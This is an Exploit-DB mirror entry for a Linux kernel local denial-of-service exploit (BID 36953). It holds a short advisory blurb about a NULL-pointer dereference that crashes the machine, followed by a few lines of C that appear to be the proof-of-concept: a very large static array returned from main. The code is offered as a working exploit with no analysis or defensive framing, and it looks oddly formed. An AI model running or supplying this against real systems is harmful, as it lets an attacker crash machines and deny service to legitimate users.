exploit-db-mirror/platforms/linux/dos/33338.c
Offensive Security 7371706026 Updated 05_15_2014
2014-05-15 04:36:26 +00:00

13 lines
358 B
C
Executable file

source: http://www.securityfocus.com/bid/36953/info
The Linux kernel is prone to a local denial-of-service vulnerability that stems from a NULL-pointer dereference.
Attackers can exploit this issue to crash the affected computer, denying service to legitimate users.
int main()
{
static long long a[1024 * 1024 * 20] = { 0 };
return a;
}